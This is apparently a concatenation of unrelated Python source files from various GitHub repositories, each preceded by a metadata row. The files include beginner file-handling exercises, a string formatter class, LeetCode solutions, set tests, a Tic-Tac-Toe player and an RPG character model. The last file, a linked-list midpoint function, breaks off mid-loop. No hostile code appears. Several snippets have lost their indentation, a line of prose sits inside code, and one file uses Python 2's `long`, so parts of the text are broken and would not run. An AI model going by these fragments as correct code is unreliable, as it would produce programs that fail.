def frq(s):
    """Record the per-character frequency table of *s* in the module-level
    Dic (keyed by the string itself) and print the whole registry."""
    counts = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    Dic[s] = counts
    print(Dic)
s = input()
frq(s)
#or
import math
def qten(s):
dic={}
dic[s]={}
for i in range(0,len(s)):
if s[i] in dic[s]:
dic[s][s[i]]+=1
else:
dic[s][s[i]]=1
print(dic)
s=input()
qten(s)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
#QUES 11
import pickle
Dic = {}
def frq(s):
dic = {}
for i in s:
dic[i] = dic.get(i,0) +1
Dic[s] = dic
f = open('hello.txt',"r")
if f.mode == 'r':
#contents = f.read()
f1 = f.read()
f1 = f1.split()
for i in f1:
frq(i)
#print (Dic)
# Store data (serialize)
handle=open('Dic.pickle','wb')
pickle.dump(Dic, handle)
handle=open('Dic.pickle','rb')
b = pickle.load(handle)
handle.close()
print (b)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#QUES 12
import random
f= open("words.txt",r)
lines = f.read()
lines = lines.split()
lines = random.sample(lines,200)
lines.sort(key=len,reverse=True)
print(lines)
f.close()
f1 = open("words_200.txt", "w")
for i in lines:
f1.write(i +'\n')
f1.close()
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
import os
print(os.getcwd())
# To print absolute path on your system
# os.path.abspath('.')
# To print files and directories in the current directory
# on your system
# os.listdir('.')
topdown − If optional argument topdown is True or not specified,
directories are scanned from top-down.
If topdown is set to False, directories are scanned from bottom-up.
import os
for root, dirs, files in os.walk(".", topdown=False):
for name in files:
print(os.path.join(root, name))
for name in dirs:
print(os.path.join(root, name))
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#QUES 13
import os
def get_file_list(path):
files= []
# r=root, d=directories, f = files
for r, d, f in os.walk(path):
for k in f:
files.append(os.path.join(r, k))
for i in files:
print(i)
path = os.getcwd()
get_file_list(path)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~`
# In[104]:
import sys
def sed(pattern,replace,file1,file2):
f = open(file1,'r')
filedata = f.read()
f.close()
newdata = filedata.replace(pattern,replace)
f = open(file2,'w')
f.write(newdata)
f.close()
print ("enter pattern string")
s = input()
print ("enter replacement string")
r = input()
print ("enter file name 1")
f1 = input()
print ("enter file name 2")
f2 = input()
sed(s,r,f1,f2)
|
10aa799e5bda732f551469a8ee74e404a4a93a83 | JensGM/pyTurbSim | /pyts/io/formatter.py | 6,361 | 4.0625 | 4 | from string import Formatter
class SuperFormatter(Formatter):
    r"""
    SuperFormatter adds the following capabilities:

    1. Initialize with a template string, and the :meth:`__call__` method uses
       this string. Thus, example usage of this formatter looks like::

           template = SuperFormatter(template_string)
           out_string = template(*args, **kwargs)

    2. White space at the end of a format specifier is stripped. This
       allows for aligning text within the template.

    3. Multiple format strings separated by ``|`` can be specified
       within a template. This formatter will loop over the format
       strings until it finds one that doesn't throw a ValueError.
       For example, the format string ``6d|<6.3f|8s`` will format the
       following objects as:

       +----------------+------------------+
       | input          | output string    |
       +================+==================+
       | ``3.74583754`` | ``'3.746 '``     |
       +----------------+------------------+
       | ``384``        | ``' 384'``       |
       +----------------+------------------+
       | ``None``       | ``'None    '``   |
       +----------------+------------------+

    4. Default values may be specified after a ``/`` at the end of the
       format string. For example if the container is
       ``{show_data:s/False}``, and there is no key ``show_data`` in
       ``**kwargs``, then ``False`` will fill that location.

    5. The :attr:`format_prfx` attribute allows the user to define a
       default container prefix. This will be prepended to all format
       specifiers that are a single-character `type` specifier. For
       example if ``format_prfx = '<20'``, then the format specifier
       ``'f'`` will be changed to ``'<20f'``, but ``'>08.3f'`` will be
       unchanged. This is applied to each specifier within a multiple
       specification, thus ``'d|f|s'`` would actually be
       ``'<20d|<20f|<20s'``.

    6. Custom format specifiers have been implemented by adding a
       hook that searches for a `_format_<specifier>` method prior to
       running the normal formatting routines. That method takes the
       value to be formatted as input (in addition to *self*), and
       should return the fully-formatted string (no further formatting
       is applied).

       For example, a custom format specifier `pet` (specified as
       ``{my_dog:pet}`` in the template) could be defined as::

           class MyNewFormatter(SuperFormatter):

               def _format_pet(self, value):
                   return value.upper()

       Note that this will throw an ``AttributeError`` if *my_dog* is an
       object without an ``upper`` method (i.e. not a string), but you
       could add to the method to handle all of the different types
       that ``value`` might be.

    7. Custom format specifiers with arguments can be specified as
       ``{my_dogs:pets(10s,10s)}``. In this case the string inside
       the parenthesis is supplied as the second argument to the
       ``_format_pets`` method. The method that implements this
       format could be defined as::

           class MyNewFormatter(SuperFormatter):

               def _format_pets(self, value, form2):
                   out = ''
                   for v, f in zip(value, form2.split(',')):
                       out += format(v, f)
                   return out
    """

    # Prefix prepended to bare single-character type codes (capability 5).
    format_prfx = ''
    # Prefix applied when rendering a "/default" fallback value as a string.
    default_format_prfx = ''
    # When True, fields that cannot be resolved render as junk text instead
    # of raising KeyError (see _fail).
    allow_sloppy = False

    def __init__(self, template):
        # Override the base methods to initialize the formatter with
        # the template string.
        self.template = template

    def __call__(self, *args, **kwargs):
        r"""
        Format the template string with `*args` and `**kwargs`.
        """
        return self.format(self.template, *args, **kwargs)

    def __iter__(self,):
        # Yield the template's parsed (literal, field, spec, conversion)
        # tuples, as produced by string.Formatter.parse.
        return self.parse(self.template)

    def get_value(self, key, args, kwargs):
        # Trailing whitespace in field names is ignored (capability 2).
        key = key.rstrip()
        # Remembered solely for the KeyError message in _fail().
        self._current_name = key
        # NOTE(review): `long` exists only on Python 2 — on Python 3 this
        # line raises NameError for positional (integer) fields.
        if isinstance(key, (int, long)):
            return args[key]
        else:
            try:
                return kwargs[key]
            except KeyError:
                # Missing keys resolve to None; format_field may still fill
                # in a "/default" value, otherwise _fail() is called.
                return None

    def _fail(self):
        # Reached when a field resolved to None and no "/default" was given.
        if self.allow_sloppy:
            return '??SOME JUNK??'
        else:
            # This _current_name business is a DIRTY HACK.
            raise KeyError("'%s' not specified and no default "
                           "value found in template." % self._current_name)

    def _format_default(self, default_val):
        # Defaults are always rendered as strings using the default prefix.
        return format(default_val, self.default_format_prfx + 's')

    def format_field(self, value, format_spec):
        # Apply capabilities 2-7 in order: strip, split off "/default",
        # split "|" alternatives, then try each specifier until one works.
        format_spec = format_spec.rstrip()  # Strip trailing spaces
        default_val = None
        if '/' in format_spec:
            format_spec, default_val = format_spec.split('/', 1)
            # set the default value if there is no input
            if value is None:
                return self._format_default(default_val)
        elif value is None:
            return self._fail()
        if '|' in format_spec:
            format_spec = format_spec.split('|')
        else:
            format_spec = [format_spec]
        for form in format_spec:
            formtail = None
            if '(' in form and form.endswith(')'):
                # Custom specifier with arguments, e.g. "pets(10s,10s)":
                # everything inside the parentheses becomes `formtail`.
                form, formtail = form.split('(', 1)
                formtail = formtail[:-1]
            try:
                # Capability 6/7: a _format_<spec> hook takes precedence over
                # the built-in formatting machinery.
                if hasattr(self, '_format_' + form):
                    if formtail is None:
                        return getattr(self, '_format_' + form)(value)
                    else:
                        return getattr(self, '_format_' + form)(value,
                                                                formtail)
                # Capability 5: bare type codes get the class-level prefix.
                if form in ["b", "c", "d", "e", "E",
                            "f", "F", "g", "G", "n",
                            "o", "s", "x", "X", "%", '']:
                    form = self.format_prfx + form
                return format(value, form)
            except ValueError:
                pass
            except TypeError:
                pass
        # Finally, try the default again:
        if default_val is None:
            raise ValueError('Invalid conversion specification')
        return self._format_default(default_val)
|
bccea6ad9572b8056f29c74172ed4d1cc16f621e | songzy12/LeetCode | /python/142.linked-list-cycle-ii.py | 467 | 3.515625 | 4 | from List import *
# try no extra space, when you are free
class Solution:
    # @param head, a ListNode
    # @return a list node
    def detectCycle(self, head):
        """Return the node where the cycle begins, or None if acyclic.

        Walks the list remembering visited nodes in a set (O(n) extra
        space); the first revisited node is the cycle entry.
        """
        seen = set()
        node = head
        while node is not None:
            if node in seen:
                return node
            seen.add(node)
            node = node.next
        return None
head=ListNode(1)
head.next=ListNode(2)
head.next.next=ListNode(3)
head.next.next.next=head
print(Solution().detectCycle(head).val)
|
00f235dcdc2118d47313d02216c25b361a4fe2af | peterjunlin/PythonTest | /practices/datatype_set.py | 1,079 | 3.921875 | 4 | def set_initialization():
set1 = {1, 2, 3}
assert type(set1) == set
set1 = set([1, 2, 3])
assert type(set1) == set
set1 = set('hello world')
assert set1 == {'h', 'd', 'r', 'l', 'o', 'e', ' ', 'w'}
def set_operations():
    """Exercise add() and the |, &, -, ^ set operators."""
    left = {1, 2, 3}
    # add() appends a new element...
    left.add(4)
    assert left == {1, 2, 3, 4}
    # ...and silently ignores values that are already present.
    left.add(1)
    assert left == {1, 2, 3, 4}
    # Sets are unordered, so listing order never affects equality.
    assert {'l', ' ', 'w', 'o', 'h', 'r'} == {' ', 'l', 'w', 'o', 'h', 'r'}
    right = {3, 4, 5, 6}
    assert (left | right) == {1, 2, 3, 4, 6, 5}  # union
    assert (left & right) == {3, 4}              # intersection
    assert (left - right) == {1, 2}              # difference
    assert (left ^ right) == {1, 2, 5, 6}        # symmetric difference
def set_comprehension():
    """A set comprehension with a filter clause."""
    filtered = {ch for ch in 'hello world' if ch not in 'abcdefg'}
    assert filtered == {'l', ' ', 'w', 'o', 'h', 'r'}
if __name__ == '__main__':
set_initialization()
set_operations()
set_comprehension()
|
20fb56bae40e7d26973527c882ee648087a74cd5 | Ruban-chris/Interview-Prep-in-Python | /cracking_the_coding_interview/1/1-7.py | 766 | 3.78125 | 4 | def rotate_matrix(square_matrix):
    # Rotate the square matrix 90 degrees clockwise in place, working ring by
    # ring (i is the ring index, j walks along the top side of the ring).
    length = len(square_matrix)
    for i in range(length//2):
        for j in range(i, length - i - 1):
            # The four positions (i,j) -> (k,l) -> (m,n) -> (o,p) map onto
            # each other under the rotation and are cycled in one tuple swap.
            k = j
            l = (length - i - 1)
            m = l
            n = (length - k - 1)
            o = n
            p = (length - l - 1)
            (square_matrix[i][j],
             square_matrix[k][l],
             square_matrix[m][n],
             square_matrix[o][p]) = (square_matrix[o][p],
                                     square_matrix[i][j],
                                     square_matrix[k][l],
                                     square_matrix[m][n])
square_1 = [
[1,2,3,4],
[5,6,7,8],
[9,10,11,12],
[13,14,15,16]
]
rotate_matrix(square_1)
print(square_1)
[
[7, 11, 5, 15],
[14, 12, 16, 10],
[9, 3, 1, 2],
[13, 4, 8, 6]
]
|
9b687451ff5872e2e264499a83aac8497631a680 | oystein-hr/just-one-more | /just_one_more.py | 905 | 3.6875 | 4 | import re
from functools import partial
def increment_match(matchobj):
    """re.sub callback: return the matched digit run incremented by one.

    A run that begins with '0' and has two or more characters gets a single
    '0' prefixed to the incremented value.

    NOTE(review): exactly one leading zero is kept regardless of the
    original padding width ('007' -> '08'); confirm against the spec before
    "fixing" this to zfill(len(...)).
    """
    digits = matchobj.group(0)
    bumped = str(int(digits) + 1)
    if re.match(r'[0]\d+', digits):
        return '0' + bumped
    return bumped
def increment(values):
    """Return a copy of *values* with every number incremented by one.

    - ints are incremented (Level 1)
    - purely alphabetic strings are dropped from the result (Level 2)
    - strings that are whole (possibly negative) numbers become ints + 1
    - any other string has each embedded digit run incremented (Level 3)
    - all other values pass through unchanged
    """
    digit_run = re.compile(r'\d+')
    is_negative_int = partial(re.match, r'^-\d+$')
    bumped = []
    for value in values:
        if type(value) is int:
            value += 1
        elif type(value) is str:
            if value.isalpha():
                continue
            if is_negative_int(value) or value.isdigit():
                value = int(value) + 1
            else:
                value = re.sub(digit_run, increment_match, value)
        bumped.append(value)
    return bumped
|
0b39be8f0f5fc1f5b5fcf763a1982857d6770a27 | ofir123/MP3-Organizer | /mp3organizer/datatypes/track.py | 1,432 | 4.0625 | 4 | class Track(object):
"""
A POPO class to hold all the track data.
Contains the following information:
Number, Title and Disc Number.
"""
def __init__(self, number, title, disc_num=None):
"""
Initializes the track data object.
Normalizes the number by adding a zero if needed.
Normalizes the title by using capital letters for each word.
:param number: The track's number.
:param title: The track's title.
:param disc_num: The Disc number (if there are multiple discs in the album).
"""
self.number = str(number) if len(str(number)) > 1 else '0' + str(number)
self.title = ' '.join(x.capitalize() for x in title.replace('\\', ' - ').replace('/', ' - ').replace('?', '').
strip().split(' '))
self.disc_num = disc_num
def __eq__(self, other):
"""
Compare tracks to one another using the information.
:param other: The other track to compare to.
:return: True if the objects are equal, and False otherwise.
"""
return other.number == self.number and other.title == self.title and other.disc_num == self.disc_num
def __repr__(self):
"""
Prints the track data in the format <##> - <Title>.
:return: The string representing the track's data.
"""
return '{} - {}'.format(self.number, self.title)
|
c4c461bb5c74a42b009eb48c8ef331a3b45384fb | SuperGuy10/LeetCode_Practice | /Python/811. Subdomain Visit Count.py | 3,262 | 3.90625 | 4 | '''
A website domain like "discuss.leetcode.com" consists of various subdomains.
At the top level, we have "com", at the next level, we have "leetcode.com", and at the lowest level, "discuss.leetcode.com".
When we visit a domain like "discuss.leetcode.com", we will also visit the parent domains "leetcode.com" and "com" implicitly.
Now, call a "count-paired domain" to be a count (representing the number of visits this domain received),
followed by a space, followed by the address. An example of a count-paired domain might be "9001 discuss.leetcode.com".
We are given a list cpdomains of count-paired domains. We would like a list of count-paired domains,
(in the same format as the input, and in any order), that explicitly counts the number of visits to each subdomain.
Example 1:
Input:
["9001 discuss.leetcode.com"]
Output:
["9001 discuss.leetcode.com", "9001 leetcode.com", "9001 com"]
Explanation:
We only have one website domain: "discuss.leetcode.com". As discussed above, the subdomain "leetcode.com" and "com" will also be visited. So they will all be visited 9001 times.
Example 2:
Input:
["900 google.mail.com", "50 yahoo.com", "1 intel.mail.com", "5 wiki.org"]
Output:
["901 mail.com","50 yahoo.com","900 google.mail.com","5 wiki.org","5 org","1 intel.mail.com","951 com"]
Explanation:
We will visit "google.mail.com" 900 times, "yahoo.com" 50 times, "intel.mail.com" once and "wiki.org" 5 times. For the subdomains, we will visit "mail.com" 900 + 1 = 901 times, "com" 900 + 50 + 1 = 951 times, and "org" 5 times.
Notes:
The length of cpdomains will not exceed 100.
The length of each domain name will not exceed 100.
Each address will have either 1 or 2 "." characters.
The input count in any count-paired domain will not exceed 10000.
The answer output can be returned in any order.
'''
'''
!!!dict.get(key[, value])!!!
get() Parameters
The get() method takes maximum of two parameters:
key - key to be searched in the dictionary
value (optional) - Value to be returned if the key is not found. The default value is None.
!!!str.split([separator [, maxsplit]])!!!
split() Parameters
The split() method takes maximum of 2 parameters:
separator (optional)- The is a delimiter. The string splits at the specified separator.
If the separator is not specified, any whitespace (space, newline etc.) string is a separator.
maxsplit (optional) - The maxsplit defines the maximum number of splits.
The default value of maxsplit is -1, meaning, no limit on the number of splits.
!!!dictionary.items()!!!
The items() method is similar to dictionary's viewitems() method in Python 2.7
'''
class Solution:
    def subdomainVisits(self, cpdomains: List[str]) -> List[str]:
        """Expand each count-paired domain into all of its parent domains and
        return the aggregated "count domain" strings (insertion order)."""
        counts = {}
        for entry in cpdomains:
            tokens = entry.split(' ')
            visits = int(tokens[0])
            parts = tokens[1].split('.')
            # Every suffix of the dotted name is a (sub)domain to credit.
            for start in range(len(parts)):
                sub = '.'.join(parts[start:])
                counts[sub] = counts.get(sub, 0) + visits
        return [' '.join([str(total), sub]) for sub, total in counts.items()]
|
3744272fa9795ad6545d698d2c011e54645bf129 | TurcsanyAdam/Gitland | /forloop5.py | 137 | 3.828125 | 4 | x = int(input("Enter a number here: "))
# Print a centred pyramid of '*' with x rows (x is read from input above):
# row i holds 2*i + 1 stars, padded on both sides with x - i - 1 spaces.
for i in range(x):
    ws = " " * (x - i - 1)
    st = "*" * i
    print(ws + st + "*" + st + ws)
|
ec5d2fd1eff3263f653b361cc4cbad311605c380 | robgoyal/TicTacToePython | /player.py | 1,423 | 4.1875 | 4 | # Name: player.py
# Author: Robin Goyal
# Last-Modified: Decemeber 9, 2017
# Purpose: Implement the player class for game
class Player(object):
    """A tic-tac-toe player that reads its moves from standard input."""
    # The two legal marks; shared across all players.
    marks = ["X", "O"]
    def __init__(self, mark, board):
        # mark: "X" or "O"; board: game board object providing
        # isLocationValid / isLocationEmpty / placeMark (defined elsewhere)
        self.mark = mark
        self.board = board
    def getMark(self):
        '''
        return -> string: mark of the player (X or O)
        '''
        return self.mark
    def takeTurn(self):
        '''
        Places a mark on the board for the player whose turn it is.
        Only applies the mark if the position is empty.
        '''
        try:
            prompt = "Player {}'s turn. Choose row and column for your turn: "
            x, y = map(int, input(prompt.format(self.mark)).strip().split())
        except ValueError:
            # Initialize x and y to -1 to enter while loop
            x, y = -1, -1
        # If the location isn't valid, the while loop condition will short circuit
        while not(self.board.isLocationValid(x, y) and self.board.isLocationEmpty(x, y)):
            prompt = "\tThat location isn't valid! Choose another row and column for your turn: "
            try:
                x, y = map(int, input(prompt.format(self.mark)).strip().split())
            # Except error where user provided a single value. Continue to next iteration of loop
            except ValueError:
                continue
        print()
        self.board.placeMark(self, x, y)
|
7913d363fc3e01bf7e563cf50ef3fffddf4089f5 | DmytroZeleniukh93/python_book | /class_9.py | 1,028 | 4 | 4 | # 9-1 Restaurant
class Restaurant:
    """Model a simple restaurant with a name and a cuisine type."""

    def __init__(self, restaurant_name, cuisine_type):
        """Store the restaurant's name and its cuisine."""
        self.restaurant_name = restaurant_name
        self.cuisine_type = cuisine_type

    def describe_restaurant(self):
        """Print the restaurant's name followed by its cuisine type."""
        print(f'{self.restaurant_name} {self.cuisine_type}')

    def open_restaurant(self):
        """Announce that the restaurant is working."""
        print(f'{self.restaurant_name} work!')
# Exercise 9-1: create a restaurant instance and call both methods.
restaurant1 = Restaurant('Volt', 'Chicken')
restaurant1.describe_restaurant()
restaurant1.open_restaurant()
# 9-2 describe_restaurant()
restaurant2 = Restaurant('Lol', 'Candy')
restaurant2.describe_restaurant()
restaurant2.open_restaurant()
# 9-3 create class User
class User:
    """A simple user record: first name, last name, and age."""

    def __init__(self, first_name, last_name, age):
        """Remember the user's name parts and age."""
        self.first_name = first_name
        self.last_name = last_name
        self.age = age

    def describe_user(self):
        """Print the user's full name and age on one line."""
        print(f'{self.first_name} {self.last_name} {self.age}')

    def greet_user(self):
        """Print a personalised greeting for the user."""
        print(f'Hello {self.first_name}!')
# Exercise 9-3: create a User and exercise both methods (prints to stdout).
user1 = User('Alir', 'Kelo', '20')
user1.describe_user()
user1.greet_user()
|
6c4663df9471e7db43c97e18b906bedbbd80833c | subhasmitasahoo/leetcode-algorithm-solutions | /convert-a-number-to-hexadecimal.py | 482 | 3.578125 | 4 | #Problem link: https://leetcode.com/problems/convert-a-number-to-hexadecimal/
#Time complexity: O(log16(n))
#Space complecity: O(1) , excluding o/p
class Solution:
    def toHex(self, num: int) -> str:
        """Convert an integer to its lowercase hexadecimal string.

        Negative numbers are interpreted as their unsigned 32-bit
        two's-complement value, per the problem statement.
        Time: O(log16 n); space: O(1) excluding the output.
        """
        if num < 0:
            # map onto the unsigned 32-bit representation
            num = 2**32 + num
        if num == 0:
            return "0"
        # Digit lookup table is clearer than the original
        # chr(ord("a") + rem % 10) arithmetic.
        digits = "0123456789abcdef"
        res = ""
        while num > 0:
            num, rem = divmod(num, 16)
            res = digits[rem] + res
        return res
|
613cf829ebaa392468005c5e751528d2041aeecb | minialappatt/Python | /file_four_letter_count.py | 969 | 3.890625 | 4 | # -*- coding: utf-8 -*-
"""
Find the count of four letter words from a file
"""
# Count words of exactly four letters in test.txt (the file must exist in
# the working directory, or open() raises FileNotFoundError).
f=open("test.txt","r")
#opening test.txt in read mode
text=f.read()
print("Printing the contents of file\n:")
print(text)
f.close()
f1=open("test.txt","r")
count=0#to store the count of 4 letter words
L=[]#list to store the words
new=""#string new initialized with null
text=f1.read()
for i in text:
    #process each character
    if i =="\n" or i =="?" or i=="," or i =="." or i==":" or i=="!" or i=="\"" or i=="'":
        #checks for newline or punctuations
        new=new+" "
        #replace newline or punctuation with a space
    else:
        new=new+i
        #copy the character into new unchanged
L=new.split(" ")#split returns a list (may contain empty strings; they are harmless below)
#L contains each word
#print(L)
for j in L:
    #process each list element
    if len(j)==4:
        #checks for 4 letter count
        count+=1#increments count
print("The count of four letter words is:",count)
f1.close()
|
9dc7220b6ce4c711f3bd4916621ce730f2d6bc8c | daniel-reich/ubiquitous-fiesta | /NpJMkLRfApRCK7Js6_24.py | 111 | 3.5625 | 4 |
def is_palindrome(wrd):
    """Return True when the sequence reads the same forwards and backwards."""
    # A sequence is a palindrome exactly when it equals its own reverse;
    # empty and single-element inputs are trivially palindromes.
    return wrd == wrd[::-1]
|
8d9e05dc23f2c7663aadd7e2233d3276e048c344 | Ferretsroq/Brute-Justice | /Characters.py | 6,225 | 3.890625 | 4 | from enum import Enum
import random
import skills
import BruteJusticeSpreadsheets
class Stat(Enum):
    """Simple Enum for identifying stat pools"""
    # values are arbitrary ordinals; only the identity of the member matters
    Might = 0
    Speed = 1
    Intellect = 2
class Weapon(Enum):
    """Simple Enum for identifying how much damage a weapon deals"""
    # the member value is the damage subtracted from a creature's hp
    # (see Character.Attack, which uses self.weapon.value)
    Light = 2
    Medium = 4
    Heavy = 6
class Pool:
    """A stat pool: a current value, a maximum, and the character's edge."""
    def __init__(self, current=0, maximum=0, edge=0):
        """Record the pool's cap, its current value, and the edge discount."""
        self.max = maximum
        self.current = current
        self.edge = edge
    def __repr__(self):
        return "{}/{}".format(self.current, self.max)
    def reduce(self, amount):
        """Drain the pool by amount.

        Returns the overflow that this pool could not absorb, so the caller
        can cascade it into the next pool; returns 0 when fully absorbed.
        """
        if self.current <= 0:
            return amount
        remainder = self.current - amount
        if remainder < 0:
            self.current = 0
            return -remainder
        self.current = remainder
        return 0
    def increase(self, amount):
        """Refill the pool by amount, never exceeding its maximum."""
        if self.current < self.max:
            self.current = min(self.max, self.current + amount)
    def effort(self, num):
        """Spend num levels of effort (3 points each, discounted by edge).

        Returns True and drains the pool on success; prints a message and
        returns False when the pool cannot cover the cost.
        """
        spent = max(0, (num*3) - self.edge)
        if spent > self.current:
            print("Not enough to spend {} effort.\nCurrent: {}\nRequired: {}".format(num, self.current, spent))
            return False
        self.reduce(spent)
        return True
class Character:
    """Holds information about a character."""
    # NOTE(review): inputSkills=[] is a mutable default argument shared across
    # calls; it is only read here, but replacing it with None is safer.
    def __init__(self, name='',
                 mightCurrent=0,
                 speedCurrent=0,
                 intellectCurrent=0,
                 mightMax=0,
                 speedMax=0,
                 intellectMax=0,
                 mightEdge=0,
                 speedEdge=0,
                 intellectEdge=0,
                 inputSkills = [],
                 weapon = Weapon.Light):
        """Initialize the character pools, skills, and weapon damage"""
        self.name = name
        self.might = Pool(mightCurrent, mightMax, mightEdge)
        self.speed = Pool(speedCurrent, speedMax, speedEdge)
        self.intellect = Pool(intellectCurrent, intellectMax, intellectEdge)
        self.adventureSkills = []
        self.combatSkills = []
        self.craftingSkills = []
        self.numeneraSkills = []
        self.socialSkills = []
        # Sort each recognised skill into its category via the skills module.
        for skill in inputSkills:
            if(skills.isSkill(skill)):
                if(skills.isAdventuringSkill(skill)):
                    self.adventureSkills.append(skill)
                elif(skills.isCombatSkill(skill)):
                    self.combatSkills.append(skill)
                elif(skills.isCraftingSkill(skill)):
                    self.craftingSkills.append(skill)
                elif(skills.isNumeneraSkill(skill)):
                    self.numeneraSkills.append(skill)
                elif(skills.isSocialSkill(skill)):
                    self.socialSkills.append(skill)
        # Flat list of all skills, used for membership tests in Challenge.
        self.skills = self.adventureSkills + \
                      self.combatSkills + \
                      self.craftingSkills + \
                      self.numeneraSkills + \
                      self.socialSkills
        self.weapon = weapon
    def roll(self):
        """Roll 1d20"""
        return random.randint(1,20)
    # NOTE(review): the `skills` parameter shadows the imported `skills`
    # module inside this method, and skills=[] is a mutable default (read-only
    # here, so harmless in practice).
    def Challenge(self, level=0, skills=[], stat=Stat.Might, effort=0, assets=0):
        """Apply effort and relevant skills, then roll 1d20 to resolve a task"""
        skillCounter = 0
        for skill in skills:
            if skill in self.skills:
                skillCounter += 1
        # Effort only lowers the target when the pool could actually pay it.
        if(self.Effort(stat, effort)):
            target = (level - skillCounter - effort - assets)*3
        else:
            target = (level - skillCounter - assets)*3
        print('Target number: {}'.format(target))
        if(target <= 0):
            return True
        else:
            roll = self.roll()
            print('{} rolled {}.'.format(self.name, roll))
            return roll >= target
    def Effort(self, stat=Stat.Might, num=1):
        """Apply effort to the relevant pool"""
        if(stat == Stat.Might):
            return self.might.effort(num)
        elif(stat == Stat.Speed):
            return self.speed.effort(num)
        elif(stat == Stat.Intellect):
            return self.intellect.effort(num)
    def isDead(self):
        """Report whether or not the character is dead"""
        return self.might.current==0 and \
               self.speed.current == 0 and \
               self.intellect.current == 0
    def Attack(self, creature, stat=Stat.Speed, effort=0, assets=0):
        """Special case of Challenge, to target a specific creature"""
        print('{} attacks {}.'.format(self.name, creature.name))
        result = self.Challenge(level=creature.level, skills=['{} Attack'.format(stat.name), '{} Weapons'.format(self.weapon.name)], effort=effort, assets=assets)
        if(result):
            creature.hp -= self.weapon.value
    def TakeDamage(self, damage):
        """Drain damage from might first, spilling overflow into speed, then intellect."""
        self.intellect.reduce(self.speed.reduce(self.might.reduce(damage)))
    def __repr__(self):
        # Build a category-by-category skill listing, then the summary sheet.
        adventuring = 'ADVENTURING SKILLS:\n' + '\n'.join(self.adventureSkills) + '\n'
        combat = '\nCOMBAT SKILLS:\n' + '\n'.join(self.combatSkills) + '\n'
        crafting = '\nCRAFTING SKILLS:\n' + '\n'.join(self.craftingSkills) + '\n'
        numenera = '\nNUMENERA SKILLS:\n' + '\n'.join(self.numeneraSkills) + '\n'
        social = '\nSOCIAL SKILLS:\n' + '\n'.join(self.socialSkills) + '\n'
        skills = '\n' + adventuring + combat + crafting + numenera + social
        return "Name: {}\nMight: {}\nSpeed: {}\nIntellect: {}\nSkills: {}".format(self.name, self.might, self.speed, self.intellect, skills)
def LoadCharacter(sheetID):
    """Build a Character from the 'Info', 'Pools' and 'Skills' sheets of a spreadsheet."""
    data = BruteJusticeSpreadsheets.ReadSpreadsheet(['Info', 'Pools', 'Skills'], sheetID)
    info = data[0]
    pools = data[1]
    skillsData = data[2]
    name = info[0][1]
    # NOTE(review): descriptor and focus are read but never used below.
    descriptor = info[1][1]
    focus = info[2][1]
    # Pools sheet layout: rows = might/speed/intellect, cols = current/max/edge.
    mightCurrent = int(pools[0][1])
    speedCurrent = int(pools[1][1])
    intellectCurrent = int(pools[2][1])
    mightMax = int(pools[0][2])
    speedMax = int(pools[1][2])
    intellectMax = int(pools[2][2])
    mightEdge = int(pools[0][3])
    speedEdge = int(pools[1][3])
    intellectEdge = int(pools[2][3])
    skillsList = []
    for skill in skillsData:
        # keep only names the skills module recognises
        if skills.isSkill(skill[0]):
            skillsList.append(skill[0])
    return Character(name=name,
                     mightCurrent=mightCurrent,
                     speedCurrent=speedCurrent,
                     intellectCurrent=intellectCurrent,
                     mightMax=mightMax,
                     speedMax=speedMax,
                     intellectMax=intellectMax,
                     mightEdge=mightEdge,
                     speedEdge=speedEdge,
                     intellectEdge=intellectEdge,
                     inputSkills=skillsList)
|
783758c6ad53cd9d0c5ee7c79e1ee7981c683645 | MatNoble/leetcode | /LeetCodeSolutions/503.py | 802 | 3.546875 | 4 | #==================================================
#==> Title: next-greater-element-ii
#==> Author: Zhang zhen
#==> Email: hustmatnoble.gmail.com
#==> GitHub: https://github.com/MatNoble
#==> Date: 1/15/2021
#==================================================
"""
https://leetcode-cn.com/problems/next-greater-element-ii/
"""
class Solution:
    def nextGreaterElements(self, nums):
        """For each element of the circular array nums, return the next
        strictly greater element; -1 where none exists."""
        size = len(nums)
        result = [-1] * size
        pending = []  # monotonic stack of indices (values non-increasing)
        # Walk the conceptually doubled array right-to-left so the stack
        # already holds wrap-around candidates during the first n positions.
        for idx in reversed(range(2 * size)):
            pos = idx % size
            while pending and nums[pending[-1]] <= nums[pos]:
                pending.pop()
            if pending:
                result[pos] = nums[pending[-1]]
            pending.append(pos)
        return result
# Quick manual check; the return value is discarded (nothing is printed).
nums = [1,2,1]
mat = Solution()
mat.nextGreaterElements(nums)
|
d55533841b8cadf02d6be11cf7affc16eb2d305c | MiroVatov/Python-SoftUni | /Python Fundamentals 2020 - 2021/03 - LISTS BASIC/Exercose 04 - 01 ver 2.py | 104 | 3.5625 | 4 | nums_str = input().split()
nums = []
# negate every whitespace-separated number read above (nums_str)
for num in nums_str:
    nums.append(-int(num))
print(nums) |
ff708a0dd6c1c95faf199f8826a581b5ca349be3 | HarikrishnaRayam/Data-Structure-and-algorithm-python | /Linked List -2/lectures/midpoint of linked list.py | 1,598 | 3.59375 | 4 | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 14 16:18:38 2020
@author: cheerag.verma
"""
class Node:
    """A single node of a singly linked list."""
    def __init__(self,data):
        # payload value and pointer to the next node (None marks the tail)
        self.data = data
        self.next = None
def createLL(arr):
    """Build a singly linked list from arr; return its head (None for empty input)."""
    if not arr:
        return None
    head = Node(arr[0])
    last = head
    # append the remaining values one by one, tracking the current tail
    for value in arr[1:]:
        last.next = Node(value)
        last = last.next
    return head
# def calcLenght(head):
# if head.next is None:
# return 1
# #smallHead = calcLenght(head.next)
# return 1 + calcLenght(head.next)
def calcLenght(head):
    """Return the number of nodes reachable from head (0 for an empty list)."""
    total = 0
    while head is not None:
        head = head.next
        total += 1
    return total
def midPointLL(head):
    """Return the data of the middle node by counting the list length first.

    For an even length this returns the first of the two middle values.
    NOTE(review): assumes head is not None (head.next would raise otherwise).
    """
    if head.next is None:
        return head.data
    l = calcLenght(head)
    current = head
    mid = l//2
    count = 1
    # walk forward until `current` is the mid-th node (1-indexed)
    while current is not None:
